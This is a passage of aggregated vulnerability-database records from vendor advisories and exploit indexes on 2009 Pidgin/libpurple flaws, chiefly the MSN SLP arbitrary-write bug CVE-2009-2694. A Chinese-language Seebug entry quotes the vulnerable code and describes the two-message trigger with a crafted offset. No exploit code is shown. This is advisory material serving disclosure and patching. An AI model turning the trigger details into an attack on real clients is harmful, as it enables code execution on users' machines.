If a user received a malicious MSN message, it was\npossible to execute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from\nusers on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve\nthis issue. Pidgin must be restarted for this update to take effect.", "published": "2009-08-18T04:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2009:1218", "cvelist": ["CVE-2009-2694"], "lastseen": "2017-09-09T07:20:01"}], "debian": [{"id": "DSA-1805", "type": "debian", "title": "pidgin -- several vulnerabilities", "description": "Several vulnerabilities have been discovered in Pidgin, a graphical multi-protocol instant messaging client. The Common Vulnerabilities and Exposures project identifies the following problems:\n\n * [CVE-2009-1373](<https://security-tracker.debian.org/tracker/CVE-2009-1373>)\n\nA buffer overflow in the Jabber file transfer code may lead to denial of service or the execution of arbitrary code.\n\n * [CVE-2009-1375](<https://security-tracker.debian.org/tracker/CVE-2009-1375>)\n\nMemory corruption in an internal library may lead to denial of service.\n\n * [CVE-2009-1376](<https://security-tracker.debian.org/tracker/CVE-2009-1376>)\n\nThe patch provided for the security issue tracked as [CVE-2008-2927](<https://security-tracker.debian.org/tracker/CVE-2008-2927>) \\- integer overflows in the MSN protocol handler - was found to be incomplete.\n\nThe old stable distribution (etch) is affected under the source package name gaim. 
However, due to build problems the updated packages couldn't be released along with the stable version. It will be released once the build problem is resolved.\n\nFor the stable distribution (lenny), these problems have been fixed in version 2.4.3-4lenny2.\n\nFor the unstable distribution (sid), these problems have been fixed in version 2.5.6-1.\n\nWe recommend that you upgrade your pidgin packages.", "published": "2009-05-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.debian.org/security/dsa-1805", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1373"], "lastseen": "2016-09-02T18:22:01"}, {"id": "DSA-1870", "type": "debian", "title": "pidgin -- insufficient input validation", "description": "Federico Muttis discovered that libpurple, the shared library that adds support for various instant messaging networks to the pidgin IM client, is vulnerable to a heap-based buffer overflow. This issue exists because of an incomplete fix for [CVE-2008-2927](<https://security-tracker.debian.org/tracker/CVE-2008-2927>) and [CVE-2009-1376](<https://security-tracker.debian.org/tracker/CVE-2009-1376>). An attacker can exploit this by sending two consecutive SLP packets to a victim via MSN.\n\nThe first packet is used to create an SLP message object with an offset of zero, the second packet then contains a crafted offset which hits the vulnerable code originally fixed in [CVE-2008-2927](<https://security-tracker.debian.org/tracker/CVE-2008-2927>) and [CVE-2009-1376](<https://security-tracker.debian.org/tracker/CVE-2009-1376>) and allows an attacker to execute arbitrary code.\n\nNote: Users with the \"Allow only the users below\" setting are not vulnerable to this attack. 
If you can't install the below updates you may want to set this via Tools->Privacy.\n\nFor the stable distribution (lenny), this problem has been fixed in version 2.4.3-4lenny3.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in version 2.5.9-1.\n\nWe recommend that you upgrade your pidgin packages.", "published": "2009-08-19T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.debian.org/security/dsa-1870", "cvelist": ["CVE-2009-2694"], "lastseen": "2016-09-02T18:37:43"}], "seebug": [{"id": "SSV:11415", "type": "seebug", "title": "Pidgin\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "description": "BUGTRAQ ID: 35067\r\nCVE(CAN) ID: CVE-2009-1376,CVE-2009-1375,CVE-2009-1374,CVE-2009-1373\r\n\r\nPidgin\u662f\u652f\u6301\u591a\u79cd\u534f\u8bae\u7684\u5373\u65f6\u901a\u8baf\u5ba2\u6237\u7aef\u3002\r\n\r\nPidgin\u5728\u5904\u7406\u5404\u79cd\u5373\u65f6\u6d88\u606f\u65f6\u5b58\u5728\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u53ef\u80fd\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u5b8c\u5168\u5165\u4fb5\u7528\u6237\u7684\u7cfb\u7edf\u3002\r\n\r\n1) \u5904\u7406MSN SLP\u6d88\u606f\u65f6\u7684\u622a\u5c3e\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\r\n2) XMPP SOCKS5 bytestream\u670d\u52a1\u5668\u5728\u521d\u59cb\u5316\u51fa\u7ad9\u6587\u4ef6\u4f20\u8f93\u65f6\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\r\n3) PurpleCircBuffer\u7ed3\u6784\u7684\u5b9e\u73b0\u4e2d\u5b58\u5728\u8fb9\u754c\u6761\u4ef6\u9519\u8bef\uff0c\u7279\u5236\u7684XMPP\u6216Sametime\u62a5\u6587\u53ef\u80fd\u5bfc\u81f4\u5185\u5b58\u7834\u574f\u800c\u5d29\u6e83\u3002\r\n\r\n4) \u7279\u5236\u7684QQ\u62a5\u6587\u53ef\u80fd\u5bfc\u81f4decrypt_out()\u51fd\u6570\u51fa\u73b08\u4e2a\u5b57\u8282\u7684\u6808\u6ea2\u51fa\u3002\r\n\n\nPidgin < 2.5.6\n 
\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2009:1060-02\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2009:1060-02\uff1aImportant: pidgin security update\r\n\u94fe\u63a5\uff1a<a href=\"https://www.redhat.com/support/errata/RHSA-2009-1060.html\" target=\"_blank\" rel=external nofollow>https://www.redhat.com/support/errata/RHSA-2009-1060.html</a>", "published": "2009-05-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-11415", "cvelist": ["CVE-2009-1373", "CVE-2009-1374", "CVE-2009-1375", "CVE-2009-1376"], "lastseen": "2017-11-19T18:49:52"}, {"id": "SSV:12249", "type": "seebug", "title": "Pidgin MSN <= 2.5.8 Remote Code Execution Exploit", "description": "No description provided by source.", "published": "2009-09-11T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-12249", "cvelist": ["CVE-2009-2694"], "lastseen": "2017-11-19T18:37:23"}, {"id": "SSV:66870", "type": "seebug", "title": "Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-66870", "cvelist": ["CVE-2009-2694"], "lastseen": "2017-11-19T14:11:42"}, {"id": "SSV:12092", "type": "seebug", "title": "Pidgin Libpurple\u5e93msn_slplink_process_msg()\u51fd\u6570\u5185\u5b58\u7834\u574f\u6f0f\u6d1e", "description": "CVE(CAN) ID: CVE-2009-2694\r\n\r\nPidgin\u662f\u652f\u6301\u591a\u79cd\u534f\u8bae\u7684\u5373\u65f6\u901a\u8baf\u5ba2\u6237\u7aef\u3002 
\r\n\r\nPidgin\u548c\u5176\u4ed6\u4e00\u4e9b\u5373\u65f6\u6d88\u606f\u5ba2\u6237\u7aef\u6240\u4f7f\u7528\u7684Libpurple\u5e93\u4e2d\u5b58\u5728\u5185\u5b58\u7834\u574f\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u5411\u804a\u5929\u5ba2\u6237\u7aef\u53d1\u9001\u7279\u5236\u7684MSNSLP\u62a5\u6587\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n\u653b\u51fb\u9700\u8981\u53d1\u9001\u4e24\u4e2a\u8fde\u7eed\u7684MSNSLP\u6d88\u606f\uff0c\u7b2c\u4e00\u4e2a\u7528\u4e8e\u5bf9slpmsg\u5b58\u50a8\u4f1a\u8bddid\uff0c\u7b2c\u4e8c\u4e2a\u7528\u4e8e\u89e6\u53d1\u6f0f\u6d1e\uff0c\u6700\u7ec8\u76ee\u6807\u662f\u5230\u8fbemsn_slplink_process_msg()\u4e2d\u7684memcpy()\u8c03\u7528\u3002\u9700\u8981\u521b\u5efa\u504f\u79fb\u4e3a\u975e0\u7684MSNSLP\u6d88\u606f\uff0c\u56e0\u4e3a\u8fd9\u4e2a\u503c\u662fmemcpy()\u7684\u76ee\u6807\u3002\r\n\r\n\u56e0\u4e3a\u504f\u79fb\u975e0\uff0c\u6240\u4ee5\u5728\u8c03\u7528msn_slplink_message_find()\u8fd4\u56deNULL\u65f6\u4f1a\u51fa\u73b0\u7b2c\u4e00\u4e2a\u95ee\u9898\uff1a\r\n\r\n/-----------\r\n\r\nif (offset == 0)\r\n{\r\n .. 
construct a new slpmsg ..\r\n}\r\nelse\r\n{\r\n slpmsg = msn_slplink_message_find(slplink,\r\nmsg->msnslp_header.session_id, msg->msnslp_header.id);\r\n}\r\n\r\nif (slpmsg == NULL)\r\n{\r\n /* Probably the transfer was canceled */\r\n purple_debug_error("msn", "Couldn't find slpmsg\\n");\r\n return;\r\n}\r\n\r\n- -----------/\r\n\r\n\u56e0\u6b64\uff0cslpmsg\u5fc5\u987b\u4e3a\u975e\u7a7a\uff0c\u8fd9\u5c31\u662f\u4e3a\u4ec0\u4e48\u9700\u8981\u53d1\u9001\u4e24\u6b21\u6d88\u606f\u624d\u80fd\u8fdb\u884c\u653b\u51fb\u3002\u53d1\u9001\u7684\u7b2c\u4e00\u4e2aMSNSLP\u6d88\u606f\u504f\u79fb\u4e3a0\uff0c\u7528\u4e8e\u521b\u5efaslpmsg\u5bf9\u8c61\uff0cLibpurple\u4f1a\u5b58\u50a8\u8fd9\u4e2a\u5bf9\u8c61\uff1b\u7b2c\u4e8c\u4e2aMSNSLP\u6d88\u606f\u7684\u504f\u79fb\u975e0\uff0c\u4f46\u7531\u4e8eLibpurple\u5df2\u7ecf\u5b58\u50a8\u4e86\u7b2c\u4e00\u4e2aMSNSLP\u6d88\u606f\uff0c\u56e0\u6b64\u8c03\u7528msn_slplink_message_find()\u4f1a\u6709\u6548\u7684\u8fd4\u56de\u4e4b\u524d\u7684\u5bf9\u8c61\u800c\u4e0d\u662fNULL\uff1a\r\n\r\n/-----------\r\n\r\nif (slpmsg->fp)\r\n{\r\n /* fseek(slpmsg->fp, offset, SEEK_SET); */\r\n len = fwrite(data, 1, len, slpmsg->fp);\r\n}\r\nelse if (slpmsg->size)\r\n{\r\n if (G_MAXSIZE - len < offset || (offset + len) > slpmsg->size)\r\n {\r\n purple_debug_error("msn",\r\n "Oversized slpmsg - msgsize=%lld offset=%" G_GSIZE_FORMAT "\r\nlen=%" G_GSIZE_FORMAT "\\n",\r\n slpmsg->size, offset, len);\r\n g_return_if_reached();\r\n }\r\n else\r\n memcpy(slpmsg->buffer + offset, data, len);\r\n }\r\n\r\n- -----------/\r\n\r\n\u4f8b\u5982\uff0c\u5982\u679c\u521b\u5efa\u7684\u7b2c\u4e00\u4e2aMSNSLP\u6d88\u606f\u5927\u5c0f\u4e3a0x01ffffff\uff0c\u7b2c\u4e8c\u4e2a\u6d88\u606f\u7684\u504f\u79fb\u4e3a\u5c0f\u4e8e0x01ffffff - len\u7684\u4efb\u610f\u503c\uff0c\u5c31\u6ee1\u8db3\u4e86\u4efb\u610f\u5199\u5165\u7684\u6761\u4ef6\u3002\r\n\r\n\u6700\u540e\uff0c\u4ee5\u5c0f\u4e8e0x01ffffff - 
len\u7684\u4efb\u610f\u504f\u79fb\u503c\u5230\u8fbe\u4e86memcpy()\uff0c\u7f13\u51b2\u533a\u6307\u54110\u3002\u8fd9\u610f\u5473\u7740\u53ef\u4ee5\u5411\u4f4e\u4e8e0x01ffffff - len\u7684\u4efb\u610f\u4f4d\u7f6e\u5199\u5165\u6570\u636e\u5185\u5bb9\u3002\n\nRob Flynn Gaim >= 0.79\r\nPidgin Pidgin 2.5.8\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2009:1218-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2009:1218-01\uff1aCritical: pidgin security update\r\n\u94fe\u63a5\uff1ahttps://www.redhat.com/support/errata/RHSA-2009-1218.html\r\n\r\nPidgin\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.pidgin.im/news/security/?id=34", "published": "2009-08-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-12092", "cvelist": ["CVE-2009-2694"], "lastseen": "2017-11-19T21:19:36"}], "gentoo": [{"id": "GLSA-200910-02", "type": "gentoo", "title": "Pidgin: Multiple vulnerabilities", "description": "### Background\n\nPidgin is a client for a variety of instant messaging protocols. \n\n### Description\n\nMultiple vulnerabilities were found in Pidgin: \n\n * Yuriy Kaminskiy reported that the OSCAR protocol implementation in Pidgin misinterprets the ICQWebMessage message type as the ICQSMS message type, triggering an allocation of a large amount of memory (CVE-2009-1889).\n * Federico Muttis of Core Security Technologies reported that the msn_slplink_process_msg() function in libpurple/protocols/msn/slplink.c in libpurple as used in Pidgin doesn't properly process incoming SLP messages, triggering an overwrite of an arbitrary memory location (CVE-2009-2694). 
NOTE: This issue reportedly exists because of an incomplete fix for CVE-2009-1376 (GLSA 200905-07).\n * bugdave reported that protocols/jabber/auth.c in libpurple as used in Pidgin does not follow the \"require TLS/SSL\" preference when connecting to older Jabber servers that do not follow the XMPP specification, resulting in a connection to the server without the expected encryption (CVE-2009-3026).\n\n### Impact\n\nA remote attacker could send specially crafted SLP (via MSN) or ICQ web messages, possibly leading to execution of arbitrary code with the privileges of the user running Pidgin, unauthorized information disclosure, or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Pidgin users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/pidgin-2.5.9-r1\"", "published": "2009-10-22T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://security.gentoo.org/glsa/200910-02", "cvelist": ["CVE-2009-1376", "CVE-2009-3026", "CVE-2009-1889", "CVE-2009-2694"], "lastseen": "2016-09-06T19:46:39"}, {"id": "GLSA-200905-07", "type": "gentoo", "title": "Pidgin: Multiple vulnerabilities", "description": "### Background\n\nPidgin (formerly Gaim) is an instant messaging client for a variety of instant messaging protocols. 
\n\n### Description\n\nMultiple vulnerabilities have been discovered in Pidgin: \n\n * Veracode reported a boundary error in the \"XMPP SOCKS5 bytestream server\" when initiating an outgoing file transfer (CVE-2009-1373).\n * Ka-Hing Cheung reported a heap corruption flaw in the QQ protocol handler (CVE-2009-1374).\n * A memory corruption flaw in \"PurpleCircBuffer\" was disclosed by Josef Andrysek (CVE-2009-1375).\n * The previous fix for CVE-2008-2927 contains a cast from uint64 to size_t, possibly leading to an integer overflow (CVE-2009-1376, GLSA 200901-13).\n\n### Impact\n\nA remote attacker could send specially crafted messages or files using the MSN, XMPP or QQ protocols, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. NOTE: Successful exploitation might require the victim's interaction. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Pidgin users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/pidgin-2.5.6\"", "published": "2009-05-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://security.gentoo.org/glsa/200905-07", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2016-09-06T19:46:03"}], "freebsd": [{"id": "B1CA65E6-5AAF-11DE-BC9B-0030843D3802", "type": "freebsd", "title": "pidgin -- multiple vulnerabilities", "description": "\nSecunia reports:\n\nSome vulnerabilities and weaknesses have been reported in Pidgin,\n\t which can be exploited by malicious people to cause a DoS or to\n\t potentially compromise a user's system.\nA truncation error in the processing of MSN SLP messages can be\n\t exploited to cause a buffer overflow.\nA boundary error in the XMPP SOCKS5 \"bytestream\" server when\n\t initiating an outgoing file 
transfer can be exploited to cause a\n\t buffer overflow.\nA boundary error exists in the implementation of the\n\t \"PurpleCircBuffer\" structure. This can be exploited to corrupt memory\n\t and cause a crash via specially crafted XMPP or Sametime\n\t packets.\nA boundary error in the \"decrypt_out()\" function can be exploited\n\t to cause a stack-based buffer overflow with 8 bytes and crash the\n\t application via a specially crafted QQ packet.\n\n", "published": "2009-06-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vuxml.freebsd.org/freebsd/b1ca65e6-5aaf-11de-bc9b-0030843d3802.html", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2016-09-26T17:24:52"}, {"id": "59E7AF2D-8DB7-11DE-883B-001E3300A30D", "type": "freebsd", "title": "pidgin -- MSN overflow parsing SLP messages", "description": "\nSecunia reports:\n\nA vulnerability has been reported in Pidgin, which can be\n\t exploited by malicious people to potentially compromise a user's\n\t system.\nThe vulnerability is caused due to an error in the\n\t \"msn_slplink_process_msg()\" function when processing MSN SLP\n\t messages and can be exploited to corrupt memory.\nSuccessful exploitation may allow execution of arbitrary\n\t code.\nThe vulnerability is reported in versions 2.5.8 and prior.\n\t Other versions may also be affected.\n\n", "published": "2009-08-18T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vuxml.freebsd.org/freebsd/59e7af2d-8db7-11de-883b-001e3300a30d.html", "cvelist": ["CVE-2009-2694"], "lastseen": "2016-09-26T17:24:51"}], "slackware": [{"id": "SSA-2009-146-01", "type": "slackware", "title": "pidgin", "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, and -current\nto fix security issues.\n\nMore details about this issue may be found in the 
Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/pidgin-2.5.6-i486-1_slack12.2.txz: Upgraded to pidgin-2.5.6.\n This version fixes security issues that could lead to a denial of service or\n the execution of arbitrary code as the user running Pidgin.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.5.6-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.5.6-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.5.6-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.5.6-i486-1.txz\n\nUpdated package for Slackware64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.5.6-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n8890772717a70b042f5c76ae4e4ab6b0 pidgin-2.5.6-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n3d7e918ff1d3eef13107472f313978a4 pidgin-2.5.6-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n144a78d203391bd7af7aac36d53061f3 pidgin-2.5.6-i486-1_slack12.2.tgz\n\nSlackware -current package:\n0b2aa951d3f6b9f8d5a9ac7e8d28c7a6 pidgin-2.5.6-i486-1.txz\n\nSlackware64 -current package:\ne79c2f0466d4714951a7f53f04740695 pidgin-2.5.6-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.5.6-i486-1_slack12.2.tgz", "published": "2009-05-26T19:19:48", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.435503", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2018-02-02T18:11:29"}, {"id": "SSA-2009-231-02", "type": "slackware", "title": "pidgin", "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, and -current\nto fix a security issue.\n\nMore details about 
this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/pidgin-2.5.9-i486-1_slack12.2.tgz:\n This update fixes a bug in Pidgin's MSN protocol implementation that can\n allow a remote attacker to send a malicious MSN message to a Pidgin user,\n which will possibly cause arbitrary code to be executed as that user.\n This issue was discovered by Federico Muttis of Core Security Technologies.\n For more information, see:\n http://www.coresecurity.com/content/libpurple-arbitrary-write\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.5.9-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.5.9-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.5.9-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.5.9-i486-1.txz\n\nUpdated package for Slackware64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.5.9-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n3ce9ef2fb489919027f5fd48aecfe16e pidgin-2.5.9-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nab5b36db9e7f97b845672d030b64b999 pidgin-2.5.9-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\nbefadfc8dde193789bcee91f7f33f8ba pidgin-2.5.9-i486-1_slack12.2.tgz\n\nSlackware -current package:\n4bc5945ad08e4fa5ebefcd1c5fc9c932 pidgin-2.5.9-i486-1.txz\n\nSlackware64 -current package:\n0a18668ccb5cd223e56789c871997769 pidgin-2.5.9-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.5.9-i486-1_slack12.2.tgz", "published": "2009-08-19T18:56:17", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.423964", "cvelist": ["CVE-2009-2694"], "lastseen": "2018-02-02T18:11:30"}], "cert": [{"id": "VU:582244", "type": "cert", "title": "Libpurple buffer overflow vulnerability", "description": "### Overview\n\nThe Libpurple instant messenger library contains a vulnerability that may allow an attacker to execute arbitrary code.\n\n### 
Description\n\n[Libpurple](<http://developer.pidgin.im/wiki/WhatIsLibpurple>) is an instant messenger (IM) library that is used by various programs to connect to multiple networks. Libpurple contains a buffer overflow vulnerability that can be triggered by sending specially crafted [MSNSLP](<http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP>) messages to a program that is using an affected version of the library. \n\nFor more technical details, see CORE Advisory [CORE-2009-0727](<http://www.coresecurity.com/content/libpurple-arbitrary-write#lref.4>). \n \n--- \n \n### Impact\n\nAn attacker may be able to execute arbitrary code or cause an IM program to crash. \n \n--- \n \n### Solution\n\n**Upgrade** \nInstant messenger programs may distribute Libpurple and will provide an updated version to their users as a security update. See the systems affected portion of this document for a partial list of affected IM clients. Users who compile Libpurple or IM programs should see the Libpurple [site](<http://developer.pidgin.im/>) or their operating system vendor for updated software. \n \n--- \n \n \n**Restrict Access** \n \nThe most likely attack vector for this issue would be via the MSN IM network. Administrators may be able to temporarily mitigate this issue by blocking access to the MSN IM network. This workaround is not likely to be totally effective. 
\n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nPidgin| | -| 21 Aug 2009 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23582244 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://pidgin.im/news/security/?id=34>\n * <http://developer.pidgin.im/wiki/WhatIsLibpurple>\n * <http://www.coresecurity.com/content/libpurple-arbitrary-write#lref.4>\n * <http://msnpiki.msnfanatic.com/index.php/MSNC:MSNSLP>\n * <http://supportwiki.cisco.com/ViewWiki/index.php/How_to_configure_the_PIX_500_Series_Firewall_with_software_version_6.x_in_order_to_block_the_MSN_messenger_with_the_access-list_command>\n\n### Credit\n\nInformation from CORE Advisory [CORE-2009-0727](<http://www.coresecurity.com/content/libpurple-arbitrary-write#lref.4>) was used in this report. \n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n * CVE IDs: [CVE-2009-2694](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2694>)\n * Date Public: 18 Aug 2009\n * Date First Published: 21 Aug 2009\n * Date Last Updated: 21 Aug 2009\n * Severity Metric: 10.19\n * Document Revision: 12\n\n", "published": "2009-08-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/582244", "cvelist": ["CVE-2009-2694", "CVE-2009-2694"], "lastseen": "2016-02-03T09:12:06"}], "packetstorm": [{"id": "PACKETSTORM:81096", "type": "packetstorm", "title": "Pidgin MSN 2.5.8 Code Execution", "description": "", "published": "2009-09-10T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/81096/Pidgin-MSN-2.5.8-Code-Execution.html", "cvelist": ["CVE-2009-2694"], "lastseen": 
"2016-12-05T22:15:13"}]}}